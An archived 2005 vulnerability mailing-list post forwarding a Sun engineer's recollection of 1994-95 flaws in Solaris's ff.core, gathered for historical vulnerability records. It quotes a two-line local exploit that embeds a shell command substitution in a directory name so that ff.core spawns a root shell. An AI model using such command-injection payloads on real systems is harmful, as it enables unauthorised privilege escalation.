[VIM] Re: old Solaris ff.core help =) (fwd)
security curmudgeon
jericho at attrition.org
Tue Jun 14 19:13:01 EDT 2005
---------- Forwarded message ----------
From: Casper.Dik at Sun.COM
To: security curmudgeon <jericho at attrition.org>
Cc: Steven Christey <coley at mitre.org>
Date: Wed, 08 Jun 2005 09:48:12 +0200
Subject: Re: old Solaris ff.core help =)
>this post:
>
>http://archives.neohapsis.com/archives/bugtraq/1995_1/0003.html
>
>This is one of a few mentions of "two vulnerabilities in ff.core". Based
>on the date, the Aug 30, 1994 IFS would be one of the two, but I can't
>find record of the second beyond the somewhat cryptic 101889 patch notes
>and several mail list posts.
>
>In short, can you confirm there were two vulnerabilities around 1994/1995
>in ff.core? If so, any hint as to what the second was, or the impact?
>Given the age of the program, I don't think it is letting any serious
>cat out of the bag =) This is purely for a historic perspective on
>vulnerabilities.
ff.core was a mess and there were certainly several vulnerabilities
in it; I corresponded a lot about this with Sun and then made sure it was
mostly fixed after I joined Sun.
It used popen/system a lot and allowed you to chown random files.
My old favourite exploit (which I had memorized and could type by hand)
after the initial (botched) fix was:
mkdir -p '/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`'
ff.core 0 1 '/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`' x
There were some symlink issues and there was the ability to rename
random files.
Casper